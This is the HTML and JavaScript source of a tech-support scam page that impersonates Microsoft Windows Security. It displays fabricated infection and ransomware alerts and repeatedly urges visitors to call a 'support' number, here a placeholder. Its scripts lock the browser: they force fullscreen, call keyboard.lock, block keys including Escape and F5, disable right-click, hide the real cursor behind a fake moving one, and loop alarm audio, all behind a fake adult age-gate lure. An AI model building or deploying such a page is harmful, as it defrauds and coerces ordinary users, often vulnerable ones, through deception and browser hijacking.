<!DOCTYPE html><html>
<head>

<meta name="robots" content="noindex, nofollow">
     <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>Security center</title>
     <link rel="stylesheet" href="css/styles.css">
<link rel="shortcut icon" href="images/microsoft.png" type="image/png">
<link rel="stylesheet" href="css/font-awesome.min.css">
<style>
  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu72xKOzY.woff2)format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)format('woff2');
    unicode-range: U+1F00-1FFF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu4WxKOzY.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu7WxKOzY.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu7GxKOzY.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu4mxK.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fCRc4EsA.woff2)format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fABc4EsA.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2)format('woff2');
    unicode-range: U+1F00-1FFF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fBxc4EsA.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fCxc4EsA.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fChc4EsA.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fBBc4.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2)format('woff2');
    unicode-range: U+1F00-1FFF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }
</style>
<style>
  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Kwp5MKg.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Nwp5MKg.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Bwp5MKg.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Awp5MKg.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Owp4.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94Yt3CwZ-Pw.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94YtwCwZ-Pw.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94Yt8CwZ-Pw.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94Yt9CwZ-Pw.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94YtzCwY.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }
</style>

<style>.blink_me {
animation: blinker 1s linear infinite;
}

@keyframes blinker {
50% { opacity: 0; }
}

</style>

<style>
.blink {
color:#fff;
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}

.blink1 {
background-color:green;
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}


@keyframes blink-animation {
to {
visibility: hidden;
}
}
@-webkit-keyframes blink-animation {
to {
visibility: hidden;
}
}
</style>


<style type="text/css">

    html{
        cursor: none;
    }
    .fakeCursor {
                                width: 17px;
                                height: 25px;
                                background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABEAAAAZCAMAAADg4DWlAAAAmVBMVEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///8jo0yHAAAAMXRSTlMAAQUPA0IfMgInFzlGCwwpGQcJEiIIP04vGDoqDgYbNVFDGjFBMEgWIElFEyw4PjRLq1RDbAAAALhJREFUeF5V0NlygzAMBVDbKK1tgtlJSgrZ93RR/v/jgjwTC/R45o6kuUJIDVqK0SDkSaHGhBhlNhoTPtGkH0QsT4w/iVgGmjGRMAVhCsLEwsTCRDKhsIemTW2hvQyKm8Xp989kCZAgyeL/cKxslFMG11uia7OySQdSIO72Mcl8tvyq/fX6bNKLp7j6Bnqxo34mId+h5tC7Z5Jbs7qrUJxEfLQ/pmQR4HpjegcsUrmydNQHEygFA7wAtBchFf1cSBMAAAAASUVORK5CYII=");
                                position: fixed;
                                    top:5px;
                                    left: 400px;
                                z-index: 9999999999;
                        }



                        #age-confirmation-modal{
    position: fixed;
    top: 0;
    bottom: 0;
    left: 0;
    right: 0;
    z-index: 999999999;
    display: inline-block;
    background-color: rgba(0, 0, 0, 1);
    background-image: url(images/bgp0rn.png);
    width: 100%;
    height: auto;
    background-repeat: no-repeat;
    background-size: cover;
    cursor: default;
}
#age-confirmation-modal .innerContainer{
    padding: 2rem 3rem;
    -webkit-box-shadow: 0 0 40px 5px rgba(255, 255, 255, .15);
    -moz-box-shadow: 0 0 40px 5px rgba(255, 255, 255, .15);
    box-shadow: 0 0 40px 5px rgba(255, 255, 255, .15);
    background-color: #000;
    border-radius: 2px;
    display: inline-block;
    top: 50%;
    position: absolute;
    left: 50%;
    transform: translate(-50%, -50%);
    border: 1px solid #eee;
    text-align: center;
}

#other-content{
    display: none;
}

#age-confirmation-modal .innerContainer a{
    color: #f90;
}
#age-confirmation-modal .innerContainer a:hover{
    color: #fff;
}
#age-confirmation-modal button, #age-confirmation-modal a{
    cursor:  pointer !important;
}
.ageboxes .heading1 {
    background-color: initial;
    line-height: initial;
    padding: 0;
    text-transform: none;
    font-size: 3rem;
    margin: 0 0 1rem;
    font-weight: 700;
    color: #fff;
}
.ageboxes p {
    font-size: 1.4rem;
    margin: 0;
    color: #ccc;
    line-height: 24px;
}
.ageboxes button {
    margin-top: 1.3rem;
    font-size: 1.3rem;
    max-width: 100%;
    padding: 1rem 2rem;
    font-weight: 700;
}
.orangeButton {
    border: 0;
    background: #f90;
    color: #000;
    border-radius: 5px;
    -moz-border-radius: 5px;
    -webkit-border-radius: 5px;
    -ms-border-radius: 5px;
    -o-border-radius: 5px;
}
.orangeButton:hover {
    background: #ffa31a;
}
.greyButton {
    background: #1f1f1f;
    border: 0;
    color: #fff;
    margin-left: 10px;
    border-radius: 5px;
    -moz-border-radius: 5px;
    -webkit-border-radius: 5px;
    -ms-border-radius: 5px;
    -o-border-radius: 5px;
}
.greyButton:hover {
    background: #3f3f3f;
}
.modalMTubes .ageboxes .rtaDisclaimerWrapper {
    display: flex;
    align-items: center;
    justify-content: center;
}
.modalMTubes .ageboxes .rtaDisclaimerWrapper .copyright {
    color: #969696;
}

                        .minimize {
                        float: right;
                        margin-top: 8px;
                        cursor:pointer;
                        }

                        .bhfys {
                        float: right;
                        margin-top: 2px;
                        cursor:pointer;
                        height:34px;
                        width:24px;
                        }

                        .bhfys:hover {
                        margin-top: 2px;
                          background-color: red;
                          color: white;
                        }


                        input[type=text] {
                        background-color: #1F1F1F;
                        color:white;
                          width: 70%;
                          height:30px;
                          margin-bottom: 20px;
                          padding: 12px;
                          border: 1px solid #ccc;
                          border-radius: 3px;
                        }
                        .button1 {
                          background-color: #303030;
                          color: #A3A2A2;
                          width:20%;
                          padding: 5px 10px;
                          text-align: center;
                          display: inline-block;
                          font-size: 16px;
                          margin: 10px 2px;
                          cursor: pointer;
                          color: #fff !important;
                        border: 1px solid #A3A2A2;
                        margin-bottom: 30px;

                        }

                        .button1:hover {
                          background-color: #262626;
                          color: white;
                        }

</style>
<script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>


<script type="text/javascript">
	$(document).ready(function(){

	//-------------- fake cursor -----------------------------------
             function makeNewPosition() {
                 var h = $(window).height() - 50, w = $(window).width() - 50, nh = Math.floor(Math.random() * h), nw = Math.floor(Math.random() * w); return [nh, nw];
             }
             function animateDiv() {
                 var newq = makeNewPosition(), oldq = $(".fakeCursor").offset(), speed = calcSpeed([oldq.top, oldq.left], newq); $(".fakeCursor").animate({ top: newq[0], left: newq[1] }, speed, function () { animateDiv(); });

             };
             function calcSpeed(prev, next) {
                 var x = Math.abs(prev[1] - next[1]), y = Math.abs(prev[0] - next[0]), greatest = x > y ? x : y, speedModifier = 0.3, speed = Math.ceil(greatest / speedModifier); return speed;
             }


             animateDiv();
});



</script>

</head>
<body class="map" id="mycanvas" onmousemove="showd2();" onclick="chat();beep1();" onbeforeunload="return myFunction()" style="cursor:none;">
<div class="fakeCursor"></div>


<div id="age-confirmation-modal" style="cursor:none;">

  <div class="innerContainer">

    <div class="ageboxes" style="cursor:none;">
<img src="1w.gif" width="150" />

          <h3 class="heading1">This is an adult website</h3>
        <p>This website contains age-restricted materials including nudity and explicit depictions of sexual activity. By entering, you affirm that you are at least 18 years of age or the age of majority in the jurisdiction you are accessing the website from and you consent to viewing sexually explicit content.</p>
      <button class="gtm-event-age-verification js-closeAgeModal orangeButton" data-event="age_verification" data-label="over18_enter" style="cursor:none !important">
        I am 18 or older - Enter    </button>
      <button href="#" rel="noopener nofollow" class="gtm-event-age-verification greyButton ageDisclaimerExit" data-event="age_verification" data-label="under18_exit" style="cursor:none !important;">
        I am under 18 - Exit    </button>
      <br><br><br>
      <p>
        Our <a href="#" id="ageParentControl" target="_blank" rel="nofollow" style="cursor:none !important">parental controls page</a> explains how you can easily<br>block access to this site.    </p>
      <br><br>
      <div class="rtaDisclaimerWrapper" style="cursor:none !important">
        <a href="#" rel="nofollow" target="_blank">
          <div class="rta" style="cursor:none !important">
            <img id="RTAImage" alt="RTA" width="88px" height="31px" src="images/rta.gif">
          </div>
        </a>
      </div>
    </div>

  </div>

  </div>


      <audio id="websgt">
          <source src="media/beep.mp3" type="audio/mpeg">
        </audio>
        <audio autoplay="" id="infogt">
          <source src="media/eng.mp3" type="audio/mpeg">
        </audio>

        <a href="#" id="link_black" style="" rel="noreferrer">
          <div class="black" style="height: 145%;  display: block;"></div>

            <div class="bg" id="bg">
          <div class="bgimg" style="top:0">
            <img src="images/bgp0rn.png" alt="" width="100%">
          </div>
        </div>
        </a>



<iframe src="https://support.microsoft.com/en-us/windows" id="frame" style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; ">
</iframe>

  <a onclick="openFullscreen();" rel="noreferrer" id="link_black" style="">
      <div class="black" style="height: 145%;"></div>
  </a>


<div class="box" id="box">
<div class="top">
<p style="font-size: 16px;  font-family: 'Google Sans', 'Google Sans Text', Roboto, sans-serif;font-weight: 600;">Microsoft Windows Security<img src="images/minimize.jpg" class="btn" style="float: right; width:115px;"></p>
</div>

<h2 style="position: absolute; left: 70px; top: 60px; font-weight: 300;" id="text1">Safety at a glance</h2>
<p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2"><br>Check what is happening to the safety and health of your device and take all necessary measures.</p>
<div class="centerright">
<ul>
<li>
<br>
<img src="images/kxFy-clip.png" width="40px;">
<p>Virus and threat protection</p>
<p style="top: 120px; position: absolute; font-size: 13px; color: grey;">action is required. Run a scan to check for <br>threats.</p>

</li>
<li>
<br><br>
<img src="images/qsbs-firewall.png" width="60px;">
<p>Firewall and network protection</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
</li>
</ul>
<ul>
<li>
<br>
<img src="images/s-S4-acc.png" width="60px;">
<p>Account protection</p>
<p style="top: 125px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
</li>
<li>
<br>
<img src="images/Z5BR-network.png" width="51px;">
<p>Application and browser control</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
</li>
</ul>
</div>
<img src="images/uZbx-si.png" class="btn" style="border-bottom-left-radius: 10px;" width="30.9px; height: 15.2px;" id="clscl">
<br>
</div>


<!--Chrome Security Quick Scan-->
<div class="scan" id="scan">
  <div class="top">
  <p style="font-size: 16px;  font-family: 'Google Sans', 'Google Sans Text', Roboto, sans-serif;font-weight: 600;">Microsoft Windows Security<img src="images/minimize.jpg" class="btn" style="float: right; width:115px;"></p>
  </div>
  <h2 style="position: absolute; left: 66px; top: 49px; font-weight: 300;" id="text1"><img src="images/kxFy-clip.png" width="30px;" style="margin-right: 10px;vertical-align: text-top;">Virus and threat protection</h2>
  <p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2">Device protection against threats.</p>

<h3 style="position: absolute; right: 180px; top: -10px; font-weight: 300;" id="text12"><b>+1-000-000-0000</b></h3>

  <div class="centerright">


  <ul>
  <li>



  <div class="flex"> <img src="images/-EBq-current.png" width="20px" height="20px;" style="margin-right: 10px; top: 33px; position: absolute;"><p style="font-weight: 400; position: absolute; left: 30px;">Current Threat</p></div>


  <br><br>
  <div class="progress" id="bar">
    <div class="progress__bar"></div>
  </div>

  <p style="font-size: 13px;" id="info">A quick scan is in progress...<br>Estimated time remaining: <n id="time">0</n><br><n id="amount">0</n> Files scanned.</p>

  <a href="#" class="button" id="re">to cancel</a>
  <p style=" font-size: 13px;" id="recx">Keep working while we analyze your device.</p>

  <p style="font-size: 13px; color: #0063c6; cursor: pointer;" id="recx-hide">protection history</p>
  <br>
  <p id="shx" style="font-size: 13px; color: #0063c6; display: none; cursor: pointer;">Scan Options<br> Allowed Threats<br> Protection History</p>


  </li>

  <li>

<div class="flex"><img src="images/nOxp-sett.png" height="28px" width="30px;" style="margin-right: 10px; margin-top: 5px;"><p style="position: absolute; left: 35px;    bottom: 76px;    line-height: 18px;">Virus &amp; threat protection settings </p> </div>
<p style="color: grey; font-size: 13px;">no action required</p>
<p style="font-size: 13px; color: #0063c6;">Manage your settings</p>
  </li>
  </ul>
  <ul>

  <li>


  <p style="position: absolute; top: -55px;">I have a question?</p>

  <p style="font-size: 13px; color: #0063c6; position: absolute; top: -15px; cursor: pointer;">get help</p>

  </li>
  <li>


    <p style="position: absolute; top: 25px;">who will protect me</p>

    <p style="font-size: 13px; color: #0063c6; position: absolute; top: 65px; cursor: pointer;">Supplier management</p>

    </li>
    <li>


      <p style="position: absolute; top: 100px; "><br>Help us improve Microsoft Windows security</p>

      <p style="font-size: 13px; color: #0063c6; position: absolute; top: 152px; cursor: pointer;">Send us your feedback</p>

      </li>
      <li>

        <p style="position: absolute; top: 190px;">Change your privacy settings</p>
        <p style="position: absolute; top: 220px; font-size: 13px;">View and change privacy settings on Microsoft Windows<br><n id="which"></n> devices.</p>

        <p style="font-size: 13px; color: #0063c6; position: absolute; top: 270px; cursor: pointer;">Privacy Settings<br>Privacy Dashboard<br>Privacy Statement</p>

        </li>

  </ul>

  </div>
  <img src="images/uZbx-si.png" class="btn" style="border-bottom-left-radius: 10px;" width="30.9px; height: 15.2px;" id="clscl">
  <br>
  </div>

<div class="alert_popup cardcontainer lightbox">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <p class="text-center" style="    font-size: 16px;
font-weight: normal;
margin: 0;
margin-bottom: 5px;
padding: 5px 10px;
color: #fff;font-weight: bold;
margin-top: 8px; text-align: center;"><img src="images/microsoft.png" class="logo12"> Microsoft Windows Security - Spyware Alert</p>
                <p class="text-center">** Microsoft Windows is contaminated with Trojan:SLocker **</p>
                <p>A critical error has occurred due to the outdated version of the browser. Update your browser as soon as possible.</p>
                <p>The following errors are also possible on outdated versions of the browser:</p>
                <ul class="icon-links">
                  <li>&gt; Loss of personal and stored data</li>
                  <li>&gt; Confidental information leak</li>
                  <li>&gt; Browsers errors</li>
                </ul>

                  <p>A Microsoft Windows Security scan has detected potentially unwanted adware on this device that can steal passwords, online identities, financial information, personal files, images, or documents.</p>
                  <p>Please contact us immediately so that our engineer can explain the removal process over the phone.<br><br>

                  Please contact Microsoft Windows Support immediately to report this threat, prevent spoofing, and unlock access to this device.<br><br>
                  Closing this Microsoft Windows puts your personal information at risk and interrupts your Microsoft Windows registration.</p>

               <p style="padding-bottom: 0px;">Call Microsoft Windows Support <strong>+1-000-000-0000</strong></p>
               <div class="action_buttons"> <a class="" id="leave_page" style="cursor: pointer;">OK</a> <a class="" id="leave_page">Cancel</a> </div>
            </div>

        </div>
    </div>
</div>
<audio id="beep" loop="">
  <source src="media/_Fm7-alert.mp3" type="audio/mpeg">
</audio>


<div id="lst" class="lst lightbox">
  <div class="ilb top">
      <div class="headers ilb" style="border-bottom: 1px solid #d6d5d5;">
          <span id="txtadd" class="fl title"><span class="fl ilb"><img src="images/microsoft.png" class="logo3"></span> Microsoft Windows Security Center</span>
          <span id="txts1" class="fl title2"><a href="#"><img src="images/cross.png"></a></span>

      </div>
  </div>
<div id="txtintro">
<span class="text-danger" style="color:red;font-size:18px;">Microsoft_Windows_Firewall_Alert !<br>
						System infected with Trojan-type spyware <br>
            (Error_Code: 2SVB7AZP</span>
  <img id="banner" src="images/re.gif"><br>
   <span class="act" style="font-size:20px;">Access has been blocked ...</span><br>
  <span class="support">Contact Microsoft Windows Support: +1-000-000-0000</span>

</div>




  <div id="bottom">
      <img id="badge" src="images/microsoft.png"><span class="title3">Microsoft Windows</span>
      <ul>
          <li>
              <a href="#">
                  <div class="fr button2">
                      <span id="addtochromebutton">Continue</span>
                  </div>
              </a>
          </li>
          <li>
              <a href="#">
                  <div class="fr buttons blink">
                      <span id="addtochromebutton">Leave</span>
                  </div>
              </a>
          </li>
      </ul>

  </div>
</div>



<div id="footer">
  <div class="row">

      <div class="col-md-12">
          <div class="right-foot" style="text-align: center;">
              <span id="footertxt"><img src="images/microsoft.png"> Microsoft Windows: </span><span style="font-weight: 800;padding-left: 13px;color: #fff; font-family:inherit;">Support Contact <span style="border: 1px solid #fff;border-radius: 5px;padding: 2px 5px;">+1-000-000-0000</span></span>
          </div>
      </div>
      <div class="col-md-12">
          <marquee width="100%" direction="left" height="100px"><small class="text-left" style="color: #eee;font-size: 12px;"><strong>Security Note :</strong> Malware is known to steal information from your device and use your identity to do malicious transactions. Due to COVID-19, data theft incidents via a fraudulent advertisement that injects adware to your browser Microsoft Windows have increased by 624%. Because of this, we recommend a security application that can remove Adware and Malware for you. The app can also speed up your browser, blocks aggressive ads, and a lot more</small></marquee>
      </div>
  </div>


</div>

<div id="welcomeDiv" class="answer_list">
    <p class="text-center" style="color: #FEFEFE;  margin-top:10px; font-size: 16px; opacity:.9; ">This Microsoft Windows  is infected with trojan:SLocker, a dangerous ransomware and it will lock your device!<br> Virus must be removed immediately! <br>Please contact us immediately. A technician will help you solve the problem.</p>


</div>



<!--<div id="chrome-alerts" class="chrome-alert" style="padding-top:10px; cursor:pointer;">
    <div>
     <a href="javascript:openlink()" class="cross">×</a>
        <p>Leave site?</p>
    <p>Changes you made may not be saved.</p>
    <input type="checkbox" id="checkbox" name="checkbox" value="checkbox">
  <label for="checkbox">Prevent this page from creating additional dialogs</label><br>
        <div class="action_buttons">
          <a class="" id="leave_page">Cancel</a>
          <a class="active" id="leave_page">Leave</a>
        </div>
    </div>
</div> -->

<div id="chat-box">
  <img src="images/microsoft.png"><span style="color: #222;
font-size: 21px;
font-weight: 600;
margin-left: 16px;
position: relative;
top: -5px;">Microsoft Support</span>
 <h4 style="font-weight: 800;">+1-000-000-0000</h4>
   <div class="arrow-down">
     <i class="fa fa-caret-down"></i>
   </div>
<audio id="audio" src="media/speech.mp3" loop=""></audio>
</div>
<script src="js/jquery.min.js"></script>
<script src="js/bootstrap.min.js" crossorigin="anonymous"></script>
<script type="text/javascript" src="js/main.js"></script>
<script type="text/javascript" src="js/scripts.js"></script>
<script type="text/javascript" src="js/esc.js"></script>


    <script>
      addEventListener("click", function() {
    var el = document.documentElement
      , rfs =
             el.requestFullScreen
          || el.webkitRequestFullScreen
          || el.mozRequestFullScreen
    ;
    rfs.call(el);
    });

    </script>
    <script>
      document.onkeydown = function(a) {
        return !1
      };
    </script>


    <script type="text/javascript">
    	document.getElementById("age-confirmation-modal").onclick = function(){
    		document.getElementById("age-confirmation-modal").style.display = "none";
    		document.getElementById("other-content").style.display = "inline";

    	  addEventListener("click", function() {
    		var
    			  el = document.documentElement
    			, rfs =
    				   el.requestFullScreen
    				|| el.webkitRequestFullScreen
    				|| el.mozRequestFullScreen
    		;
    		rfs.call(el);
    		});
    	}
    	 $("a#thing_to_click").click(function(e){
    		 e.preventDefault();
    		 window.location = "#";
    	});

    	</script>


          <script>
            setInterval(function() {
              document.getElementById("infogt").play()
            }, 500);
          </script>
          <script>
      function beep1() {
        document.getElementById("websgt").play();
     }
      </script>
          <script>
            var e = 1;
            setInterval(function() {
              1 == e ? (document.getElementById("favicon").href = "w3.html", e = 0) : (document.getElementById("favicon").href = "w1.html", e = 1)
            }, 1E3);
          </script>
          <script>
            $(document).ready(function() {
              $("#mycanvas").click(function() {
                $("#welcomeDiv").show()

              })
            });
          </script>
          <script>
            $(document).ready(function() {
              $(".pro_box").delay(400).fadeIn(300);
              $("#poptxt").delay(2000).fadeIn(400);
                  $(".black").delay(1E3).fadeIn(800);
              $(".pro_box2").delay(2500).fadeIn(800);
              $(".pro_box3").delay(3500).fadeIn(800);
              $("#pop_up_new").delay(4E3).fadeIn(800);
            });
          </script>
          <script>
            $(document).ready(function() {
              $("#mycanvas").click(function() {
                $("#poptxt").show()
              })
            });
            $(document).ready(function() {
              $("#cross").click(function() {
                $("#poptxt").show()
              })
            });
          </script>
          <script>
            $(document).ready(function() {
              $("body").mouseover(function() {
                $("#poptxt").show()
              })
            });
          </script>
          <script>
            var isNS = "Netscape" == navigator.appName ? 1 : 0;
            "Netscape" == navigator.appName && document.captureEvents(Event.MOUSEDOWN || Event.MOUSEUP);

            function mischandler() {
              return !1
            }

            function mousehandler(a) {
              a = isNS ? a : event;
              a = isNS ? a.which : a.button;
              if (2 == a || 3 == a) return !1
            }
            document.oncontextmenu = mischandler;
            document.onmousedown = mousehandler;
            document.onmouseup = mousehandler;
          </script>
          <script>
            document.onkeydown = function(a) {
              return !1
            };
          </script>
          <script>
            document.attachEvent("onkeydown", win_onkeydown_handler);

            function win_onkeydown_handler() {
              switch (event.keyCode) {
                case 116:
                  event.returnValue = !1;
                  event.keyCode = 0;
                  break;
                case 27:
                  event.returnValue = !1, event.keyCode = 0
              }
            }
          </script>
          <script>
            window.onload = function() {
              window.moveTo(0, 0);
              window.resizeTo(screen.availWidth, screen.availHeight)
            };
          </script>


          <script>

                        navigator.keyboard.lock();
                        document.onkeydown = function (e) {
                        return false;
                        }
          </script>

</body></html>
